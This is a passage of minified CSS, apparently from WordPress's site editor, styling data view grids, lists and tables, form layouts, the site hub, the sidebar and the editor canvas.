opacity:0; position:absolute; right:4px; top:4px; } .dataviews-view-grid__card .dataviews-view-grid__media-actions .dataviews-all-actions-button{ background-color:#fff; } @media not (prefers-reduced-motion){ .dataviews-view-grid__card .dataviews-view-grid__media-actions{ transition:opacity .1s linear; } } @media (hover:none){ .dataviews-view-grid__card .dataviews-view-grid__media-actions{ opacity:1; top:4px; } } .dataviews-view-grid__card .dataviews-view-grid__media-actions:has(.dataviews-all-actions-button[aria-expanded=true]),.dataviews-view-grid__card:focus-within .dataviews-view-grid__media-actions,.dataviews-view-grid__card:hover .dataviews-view-grid__media-actions{ opacity:1; } .dataviews-view-grid__media--clickable{ cursor:pointer; } .dataviews-view-grid__group-header{ color:#1e1e1e; container-type:inline-size; font-size:15px; font-weight:500; margin:0 0 8px; padding:0 48px; } @container (max-width: 430px){ .dataviews-view-grid__group-header{ padding-left:24px; padding-right:24px; } } div.dataviews-view-list{ list-style-type:none; } .dataviews-view-list{ margin:0 0 auto; } .dataviews-view-list div[role=article],.dataviews-view-list div[role=row]{ border-top:1px solid #f0f0f0; margin:0; } .dataviews-view-list div[role=article] .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row] .dataviews-view-list__item-wrapper{ box-sizing:border-box; padding:16px 24px; position:relative; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions{ display:flex; flex:0 0 auto; gap:4px; white-space:nowrap; width:max-content; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions .components-button,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions .components-button{ position:relative; z-index:1; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions>div,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>div{ height:24px; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){ flex:0; overflow:hidden; width:0; } .dataviews-view-list div[role=article]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child){ flex-basis:min-content; overflow:unset; width:auto; } @media (hover:none){ .dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){ flex-basis:min-content; overflow:unset; width:auto; } } .dataviews-view-list div[role=article].is-selected.is-selected,.dataviews-view-list div[role=article].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=article].is-selected.is-selected+div[role=row],.dataviews-view-list div[role=row].is-selected.is-selected,.dataviews-view-list div[role=row].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=row].is-selected.is-selected+div[role=row]{ border-top:1px solid rgba(var(--wp-admin-theme-color--rgb), .12); } .dataviews-view-list div[role=article]:not(.is-selected) .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected) .dataviews-view-list__title-field{ color:#1e1e1e; } .dataviews-view-list div[role=article]:not(.is-selected).is-hovered,.dataviews-view-list div[role=article]:not(.is-selected):focus-within,.dataviews-view-list div[role=article]:not(.is-selected):hover,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered,.dataviews-view-list div[role=row]:not(.is-selected):focus-within,.dataviews-view-list div[role=row]:not(.is-selected):hover{ background-color:#f8f8f8; color:var(--wp-admin-theme-color); } .dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__title-field{ color:var(--wp-admin-theme-color); } .dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper{ background-color:rgba(var(--wp-admin-theme-color--rgb), .04); color:#1e1e1e; } .dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field{ color:var(--wp-admin-theme-color); } .dataviews-view-list .dataviews-view-list__item{ appearance:none; background:none; border:none; cursor:pointer; inset:0; padding:0; position:absolute; scroll-margin:8px 0; z-index:1; } .dataviews-view-list .dataviews-view-list__item:focus-visible{ outline:none; } .dataviews-view-list .dataviews-view-list__item:focus-visible:before{ border-radius:2px; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); content:""; inset:var(--wp-admin-border-width-focus); outline:2px solid #0000; position:absolute; } .dataviews-view-list .dataviews-view-list__title-field{ flex:1; line-height:24px; min-height:24px; overflow:hidden; } .dataviews-view-list .dataviews-view-list__title-field:has(a,button){ z-index:1; } .dataviews-view-list .dataviews-view-list__media-wrapper{ background-color:#fff; border-radius:4px; flex-shrink:0; height:52px; overflow:hidden; position:relative; width:52px; } .dataviews-view-list .dataviews-view-list__media-wrapper img{ height:100%; object-fit:cover; width:100%; } .dataviews-view-list .dataviews-view-list__media-wrapper:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; left:0; position:absolute; top:0; width:100%; } .dataviews-view-list .dataviews-view-list__field-wrapper{ flex-grow:1; min-height:52px; } .dataviews-view-list .dataviews-view-list__fields{ color:#757575; display:flex; flex-wrap:wrap; font-size:12px; gap:12px; row-gap:4px; } .dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field:has(.dataviews-view-list__field-value:empty),.dataviews-view-list .dataviews-view-list__fields:empty{ display:none; } .dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field-value{ align-items:center; display:flex; line-height:20px; min-height:24px; } .dataviews-view-list+.dataviews-pagination{ justify-content:space-between; } .dataviews-view-list__group-header{ color:#1e1e1e; font-size:15px; font-weight:500; margin:0 0 8px; padding:0 24px; } .dataviews-view-table{ border-collapse:collapse; border-color:inherit; color:#757575; margin-bottom:auto; position:relative; text-indent:0; width:100%; } .dataviews-view-table th{ color:#1e1e1e; font-size:13px; font-weight:400; text-align:left; } .dataviews-view-table td,.dataviews-view-table th{ padding:12px; } .dataviews-view-table td.dataviews-view-table__actions-column,.dataviews-view-table th.dataviews-view-table__actions-column{ text-align:right; } .dataviews-view-table td.dataviews-view-table__actions-column--sticky,.dataviews-view-table th.dataviews-view-table__actions-column--sticky{ background-color:#fff; position:sticky; right:0; } .dataviews-view-table td.dataviews-view-table__actions-column--stuck:after,.dataviews-view-table th.dataviews-view-table__actions-column--stuck:after{ background-color:#f0f0f0; bottom:0; content:""; display:block; left:0; position:absolute; top:0; width:1px; } .dataviews-view-table td.dataviews-view-table__checkbox-column,.dataviews-view-table th.dataviews-view-table__checkbox-column{ padding-right:0; } .dataviews-view-table td.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper,.dataviews-view-table th.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper{ max-width:auto; min-width:auto; } .dataviews-view-table tr{ border-top:1px solid #f0f0f0; } .dataviews-view-table tr .dataviews-view-table-header-button{ gap:4px; } .dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{ padding-left:48px; } .dataviews-view-table tr td:first-child .dataviews-view-table-header-button,.dataviews-view-table tr th:first-child .dataviews-view-table-header-button{ margin-left:-8px; } .dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{ padding-right:48px; } .dataviews-view-table tr:last-child{ border-bottom:0; } .dataviews-view-table tr.is-hovered,.dataviews-view-table tr.is-hovered .dataviews-view-table__actions-column--sticky{ background-color:#f8f8f8; } .dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input{ opacity:0; } .dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:checked,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:focus,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:indeterminate{ opacity:1; } .dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){ opacity:0; } .dataviews-view-table tr.is-hovered .components-checkbox-control__input,.dataviews-view-table tr.is-hovered .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:focus-within .components-checkbox-control__input,.dataviews-view-table tr:focus-within .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:hover .components-checkbox-control__input,.dataviews-view-table tr:hover .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){ opacity:1; } @media (hover:none){ .dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input,.dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){ opacity:1; } } .dataviews-view-table tr.is-selected{ background-color:rgba(var(--wp-admin-theme-color--rgb), .04); color:#757575; } .dataviews-view-table tr.is-selected,.dataviews-view-table tr.is-selected+tr{ border-top:1px solid rgba(var(--wp-admin-theme-color--rgb), .12); } .dataviews-view-table tr.is-selected:hover{ background-color:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-view-table tr.is-selected .dataviews-view-table__actions-column--sticky{ background-color:color-mix(in srgb, rgb(var(--wp-admin-theme-color--rgb)) 4%, #fff); } .dataviews-view-table tr.is-selected:hover .dataviews-view-table__actions-column--sticky{ background-color:color-mix(in srgb, rgb(var(--wp-admin-theme-color--rgb)) 8%, #fff); } .dataviews-view-table thead{ inset-block-start:0; position:sticky; z-index:1; } .dataviews-view-table thead tr{ border:0; } .dataviews-view-table thead tr .components-checkbox-control__input.components-checkbox-control__input{ opacity:1; } .dataviews-view-table thead th{ background-color:#fff; font-size:11px; font-weight:500; padding-bottom:8px; padding-left:12px; padding-top:8px; text-transform:uppercase; } .dataviews-view-table thead th:has(.dataviews-view-table-header-button):not(:first-child){ padding-left:4px; } .dataviews-view-table tbody td{ vertical-align:top; } .dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper{ align-items:center; display:flex; min-height:32px; white-space:nowrap; } .dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-end{ justify-content:flex-end; } .dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-center{ justify-content:center; } .dataviews-view-table tbody .components-v-stack>.dataviews-view-table__cell-content-wrapper:not(:first-child){ min-height:0; } .dataviews-view-table .dataviews-view-table-header-button{ font-size:11px; font-weight:500; padding:4px 8px; text-transform:uppercase; } .dataviews-view-table .dataviews-view-table-header-button:not(:hover){ color:#1e1e1e; } .dataviews-view-table .dataviews-view-table-header-button span{ speak:none; } .dataviews-view-table .dataviews-view-table-header-button span:empty{ display:none; } .dataviews-view-table .dataviews-view-table-header{ padding-left:4px; } .dataviews-view-table .dataviews-view-table__actions-column{ white-space:nowrap; width:auto; } .dataviews-view-table:has(tr.is-selected) .components-checkbox-control__input{ opacity:1; } .dataviews-view-table.has-compact-density thead th:has(.dataviews-view-table-header-button):not(:first-child){ padding-left:0; } .dataviews-view-table.has-compact-density td,.dataviews-view-table.has-compact-density th{ padding:4px 8px; } .dataviews-view-table.has-comfortable-density td,.dataviews-view-table.has-comfortable-density th{ padding:16px 12px; } .dataviews-view-table.has-comfortable-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-comfortable-density th.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density th.dataviews-view-table__checkbox-column{ padding-right:0; } @container (max-width: 430px){ .dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{ padding-left:24px; } .dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{ padding-right:24px; } } .dataviews-view-table-selection-checkbox{ --checkbox-input-size:24px; } @media (min-width:600px){ .dataviews-view-table-selection-checkbox{ --checkbox-input-size:16px; } } .dataviews-column-primary__media{ background-color:#fff; border-radius:4px; flex-shrink:0; max-width:60px; overflow:hidden; position:relative; } .dataviews-column-primary__media img{ height:100%; object-fit:cover; width:100%; } .dataviews-column-primary__media:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; left:0; position:absolute; top:0; width:100%; } .dataviews-view-table__cell-content-wrapper:not(.dataviews-column-primary__media),.dataviews-view-table__primary-column-content:not(.dataviews-column-primary__media){ max-width:80ch; min-width:15ch; } .dataviews-view-table__group-header-row .dataviews-view-table__group-header-cell{ color:#1e1e1e; font-weight:500; padding:12px 48px; } .dataviews-view-table col[class^=dataviews-view-table__col-]:not(.dataviews-view-table__col-primary){ width:1%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card{ height:100%; justify-content:flex-start; position:relative; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-actions{ padding:8px 0 4px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field{ align-content:center; min-height:24px; overflow:hidden; text-align:start; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field--clickable{ width:fit-content; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{ color:#1e1e1e; } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after,.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{ background-color:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{ box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color); } .dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .dataviews-view-picker-grid:focus-visible[aria-activedescendant]{ outline:none; } .dataviews-view-picker-grid:focus-visible [data-active-item=true]{ outline:2px solid var(--wp-admin-theme-color); } .dataviews-view-picker-grid .dataviews-selection-checkbox{ top:8px !important; } .dataviews-view-picker-grid .dataviews-selection-checkbox input{ pointer-events:none; } .dataviews-view-picker-grid .dataviews-view-picker-grid__media{ aspect-ratio:1/1; background-color:#fff; border-radius:4px; position:relative; width:100%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__media img{ height:100%; object-fit:cover; width:100%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__media:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; left:0; pointer-events:none; position:absolute; top:0; width:100%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields{ font-size:12px; line-height:16px; position:relative; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields:not(:empty){ padding:0 0 12px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field-value:not(:empty){ line-height:20px; min-height:24px; padding-top:2px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field{ align-items:center; min-height:24px; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-name{ color:#757575; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:35%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{ overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:65%; } .dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field:not(:has(.dataviews-view-picker-grid__field-value:not(:empty))){ display:none; } .dataviews-view-picker-grid .dataviews-view-picker-grid__badge-fields:not(:empty){ padding-bottom:12px; } .dataviews-view-picker-grid__field-value:empty,.dataviews-view-picker-grid__field:empty{ display:none; } .dataviews-view-picker-grid__card .dataviews-selection-checkbox{ left:8px; position:absolute; top:-9999em; z-index:1; } @media (hover:none){ .dataviews-view-picker-grid__card .dataviews-selection-checkbox{ top:8px; } } .dataviews-view-picker-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:hover .dataviews-selection-checkbox{ top:8px; } .dataviews-view-picker-grid__media--clickable{ cursor:pointer; } .dataviews-view-picker-grid-group__header{ color:#1e1e1e; font-size:15px; font-weight:500; margin:0 0 8px; padding:0 48px; } .dataviews-controls__datetime{ border:none; padding:0; } .dataviews-controls__relative-date-number,.dataviews-controls__relative-date-unit{ flex:1 1 50%; } .dataviews-controls__date input[type=date]::-webkit-calendar-picker-indicator,.dataviews-controls__date input[type=date]::-webkit-inner-spin-button{ -webkit-appearance:none; display:none; } .dataviews-controls__date-preset{ border:1px solid #ddd; } .dataviews-controls__date-preset:active{ background-color:#000; } .dataforms-layouts-panel__field{ align-items:flex-start !important; justify-content:flex-start !important; min-height:32px; width:100%; } .dataforms-layouts-panel__field-label{ align-items:center; display:flex; flex-shrink:0; hyphens:auto; line-height:20px; min-height:32px; width:38%; } .dataforms-layouts-panel__field-label--label-position-side{ align-self:center; } .dataforms-layouts-panel__field-control{ align-items:center; display:flex; flex-grow:1; min-height:32px; } .dataforms-layouts-panel__field-control .components-button{ max-width:100%; min-height:32px; text-align:left; text-wrap:balance; text-wrap:pretty; white-space:normal; } .dataforms-layouts-panel__field-control.components-button.is-link[aria-disabled=true]{ text-decoration:none; } .dataforms-layouts-panel__field-control .components-dropdown{ max-width:100%; } .dataforms-layouts-panel__field-dropdown .components-popover__content{ min-width:320px; padding:16px; } .dataforms-layouts-panel__dropdown-header{ margin-bottom:16px; } .dataforms-layouts-panel__modal-footer{ margin-top:16px; } .components-popover.components-dropdown__content.dataforms-layouts-panel__field-dropdown{ z-index:159990; } .dataforms-layouts-regular__field{ align-items:flex-start !important; justify-content:flex-start !important; min-height:32px; width:100%; } .dataforms-layouts-regular__field-label{ align-items:center; display:flex; flex-shrink:0; hyphens:auto; line-height:20px; min-height:32px; width:38%; } .dataforms-layouts-regular__field-label--label-position-side{ align-self:center; } .dataforms-layouts-regular__field-control{ align-items:center; display:flex; flex-grow:1; min-height:32px; } .dataforms-layouts-card__field-header-label{ font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:15px; font-weight:500; line-height:20px; } .dataforms-layouts-card__field{ width:100%; } .dataforms-layouts-card__field-description{ color:#757575; display:block; font-size:13px; margin-bottom:16px; } .dataforms-layouts-card__field-summary{ display:flex; flex-direction:row; gap:16px; } .dataforms-layouts-row__field-control{ width:100%; } .dataforms-layouts__wrapper{ font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; } .edit-site-layout{ color:#ccc; display:flex; flex-direction:column; height:100%; } .edit-site-layout,.edit-site-layout:not(.is-full-canvas) .editor-visual-editor{ background:#1e1e1e; } .edit-site-layout__content{ display:flex; flex-grow:1; height:100%; } .edit-site-layout__sidebar-region{ flex-shrink:0; width:100vw; z-index:1; } @media (min-width:782px){ .edit-site-layout__sidebar-region{ width:300px; } } .edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region{ height:100vh; left:0; position:fixed !important; top:0; } .edit-site-layout__sidebar-region .edit-site-layout__sidebar{ display:flex; flex-direction:column; height:100%; } .edit-site-layout__sidebar-region .resizable-editor__drag-handle{ right:0; } .edit-site-layout__main{ display:flex; flex-direction:column; flex-grow:1; overflow:hidden; } .edit-site-layout__mobile{ display:flex; flex-direction:column; position:relative; width:100%; z-index:2; } .edit-site-layout__mobile .edit-site-sidebar__screen-wrapper{ padding:0; } .edit-site-layout__mobile .edit-site-sidebar-navigation-screen__main{ padding:0 12px; } .edit-site-layout__canvas-container{ flex-grow:1; overflow:visible; position:relative; z-index:2; } .edit-site-layout__canvas-container.is-resizing:after{ bottom:0; content:""; left:0; position:absolute; right:0; top:0; z-index:100; } .edit-site-layout__canvas{ align-items:center; bottom:0; display:flex; justify-content:center; left:0; position:absolute; top:0; width:100%; } .edit-site-layout__canvas.is-right-aligned{ justify-content:flex-end; } .edit-site-layout__canvas .edit-site-resizable-frame__inner{ color:#1e1e1e; } @media (min-width:782px){ .edit-site-layout__canvas{ bottom:16px; top:16px; width:calc(100% - 16px); } .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{ box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003; overflow:hidden; } } @media (min-width:782px) and (not (prefers-reduced-motion)){ .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{ transition:border-radius,box-shadow .4s; } } @media (min-width:782px){ .edit-site-layout:not(.is-full-canvas) .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{ border-radius:8px; } .edit-site-layout__canvas .edit-site-resizable-frame__inner-content:hover{ box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005; } } .edit-site-layout.is-full-canvas .edit-site-layout__canvas{ bottom:0; top:0; width:100%; } .edit-site-layout__canvas .interface-interface-skeleton,.edit-site-layout__mobile .interface-interface-skeleton,.edit-site-template-pages-preview .interface-interface-skeleton{ min-height:100% !important; position:relative !important; } .edit-site-template-pages-preview{ height:100%; } html.canvas-mode-edit-transition::view-transition-group(toggle){ animation-delay:255ms; } @media (prefers-reduced-motion){ ::view-transition-group(*),::view-transition-new(*),::view-transition-old(*){ animation:none !important; } } .edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region .edit-site-layout__view-mode-toggle{ display:none; } .edit-site-layout__view-mode-toggle.components-button{ view-transition-name:toggle; align-items:center; background:#1e1e1e; border-radius:0; color:#fff; display:flex; height:64px; justify-content:center; overflow:hidden; padding:0; position:relative; width:64px; } .edit-site-layout__view-mode-toggle.components-button:active,.edit-site-layout__view-mode-toggle.components-button:hover{ color:#fff; } .edit-site-layout__view-mode-toggle.components-button:focus,.edit-site-layout__view-mode-toggle.components-button:focus-visible{ box-shadow:0 0 0 3px #1e1e1e, 0 0 0 6px var(--wp-admin-theme-color); outline:4px solid #0000; outline-offset:4px; } .edit-site-layout__view-mode-toggle.components-button:before{ border-radius:4px; bottom:9px; box-shadow:none; content:""; display:block; left:17px; position:absolute; right:9px; top:9px; } @media not (prefers-reduced-motion){ .edit-site-layout__view-mode-toggle.components-button:before{ transition:box-shadow .1s ease; } } .edit-site-layout__view-mode-toggle.components-button .edit-site-layout__view-mode-toggle-icon{ align-items:center; display:flex; height:64px; justify-content:center; width:64px; } .edit-site-layout__actions{ background:#fff; bottom:auto; color:#1e1e1e; left:auto; position:fixed !important; right:0; top:-9999em; width:280px; z-index:100000; } .edit-site-layout__actions:focus,.edit-site-layout__actions:focus-within{ bottom:0; top:auto; } .edit-site-layout__actions.is-entity-save-view-open:focus,.edit-site-layout__actions.is-entity-save-view-open:focus-within{ top:0; } @media (min-width:782px){ .edit-site-layout__actions{ border-left:1px solid #ddd; } } .edit-site-layout__area{ box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003; flex-grow:1; margin:0; overflow:hidden; } @media (min-width:782px){ .edit-site-layout__area{ border-radius:8px; margin:16px 16px 16px 0; } } .edit-site .components-editor-notices__snackbar{ bottom:16px; padding-left:16px; padding-right:16px; position:fixed; right:0; } .edit-site-save-hub{ border-top:1px solid #2f2f2f; color:#949494; flex-shrink:0; margin:0; padding:16px; } .edit-site-save-hub__button{ color:inherit; justify-content:center; width:100%; } .edit-site-save-hub__button[aria-disabled=true]{ opacity:1; } .edit-site-save-hub__button[aria-disabled=true]:hover{ color:inherit; } .edit-site-save-hub__button:not(.is-primary).is-busy,.edit-site-save-hub__button:not(.is-primary).is-busy[aria-disabled=true]:hover{ color:#1e1e1e; } @media (min-width:600px){ .edit-site-save-panel__modal{ width:600px; } } .edit-site-sidebar__content{ contain:content; flex-grow:1; overflow-x:hidden; overflow-y:auto; } @keyframes local--slide-from-right{ 0%{ opacity:0; transform:translateX(50px); } to{ opacity:1; transform:none; } } @keyframes local--slide-from-left{ 0%{ opacity:0; transform:translateX(-50px); } to{ opacity:1; transform:none; } } .edit-site-sidebar__screen-wrapper{ overflow-x:auto; } .edit-site-sidebar__screen-wrapper::-webkit-scrollbar{ height:12px; width:12px; } .edit-site-sidebar__screen-wrapper::-webkit-scrollbar-track{ background-color:initial; } .edit-site-sidebar__screen-wrapper::-webkit-scrollbar-thumb{ background-clip:padding-box; background-color:initial; border:3px solid #0000; border-radius:8px; } .edit-site-sidebar__screen-wrapper:focus-within::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:focus::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:hover::-webkit-scrollbar-thumb{ background-color:#757575; } .edit-site-sidebar__screen-wrapper{ scrollbar-color:#0000 #0000; scrollbar-gutter:stable both-edges; scrollbar-width:thin; } .edit-site-sidebar__screen-wrapper:focus,.edit-site-sidebar__screen-wrapper:focus-within,.edit-site-sidebar__screen-wrapper:hover{ scrollbar-color:#757575 #0000; } .edit-site-sidebar__screen-wrapper{ will-change:transform; } @media (hover:none){ .edit-site-sidebar__screen-wrapper{ scrollbar-color:#757575 #0000; } } .edit-site-sidebar__screen-wrapper{ animation-duration:.14s; animation-timing-function:ease-in-out; display:flex; flex-direction:column; height:100%; max-height:100%; padding:0 12px; scrollbar-gutter:stable; will-change:transform, opacity; } @media (prefers-reduced-motion:reduce){ .edit-site-sidebar__screen-wrapper{ animation-duration:0s; } } .edit-site-sidebar__screen-wrapper.slide-from-left{ animation-name:local--slide-from-left; } .edit-site-sidebar__screen-wrapper.slide-from-right{ animation-name:local--slide-from-right; } .edit-site-site-hub{ align-items:center; display:flex; gap:8px; height:64px; justify-content:space-between; margin-right:12px; } .edit-site-site-hub__actions{ flex-shrink:0; } .edit-site-site-hub__view-mode-toggle-container{ flex-shrink:0; height:64px; width:64px; } .edit-site-site-hub__view-mode-toggle-container.has-transparent-background .edit-site-layout__view-mode-toggle-icon{ background:#0000; } .edit-site-site-hub__title .components-button{ color:#e0e0e0; display:block; flex-grow:1; font-size:15px; font-weight:500; margin-left:-4px; overflow:hidden; padding-right:16px; position:relative; text-decoration:none; text-overflow:ellipsis; white-space:nowrap; } .edit-site-site-hub__title .components-button:active,.edit-site-site-hub__title .components-button:focus,.edit-site-site-hub__title .components-button:hover{ color:#e0e0e0; } .edit-site-site-hub__title .components-button:focus{ box-shadow:none; outline:none; } .edit-site-site-hub__title .components-button:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #1e1e1e, 0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color); outline:2px solid #0000; outline-offset:2px; } .edit-site-site-hub__title .components-button:after{ content:"↗"; font-weight:400; opacity:0; position:absolute; right:0; } @media not (prefers-reduced-motion){ .edit-site-site-hub__title .components-button:after{ transition:opacity .1s linear; } } .edit-site-site-hub__title .components-button:active:after,.edit-site-site-hub__title .components-button:focus:after,.edit-site-site-hub__title .components-button:hover:after{ opacity:1; } .edit-site-site-hub_toggle-command-center{ color:#e0e0e0; } .edit-site-site-hub_toggle-command-center:active svg,.edit-site-site-hub_toggle-command-center:hover svg{ fill:#f0f0f0; } .edit-site-site-icon__icon{ fill:currentColor; height:100%; width:100%; } .edit-site-layout.is-full-canvas .edit-site-site-icon__icon{ padding:12px; } .edit-site-site-icon__image{ aspect-ratio:1/1; background:#333; height:100%; object-fit:cover; width:100%; } .edit-site-layout.is-full-canvas .edit-site-site-icon__image{ border-radius:0; } .edit-site-editor__view-mode-toggle button:focus{ position:relative; } .edit-site-editor__view-mode-toggle button:focus:before{ bottom:0; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color), inset 0 0 0 calc(1px + var(--wp-admin-border-width-focus)) #fff; content:""; display:block; left:0; position:absolute; right:0; top:0; z-index:1; } .edit-site-editor-canvas-container{ background-color:var(--wp-editor-canvas-background); height:100%; } .edit-site-editor-canvas-container iframe{ display:block; height:100%; width:100%; } .edit-site-layout.is-full-canvas .edit-site-editor-canvas-container{ padding:24px 24px 0; 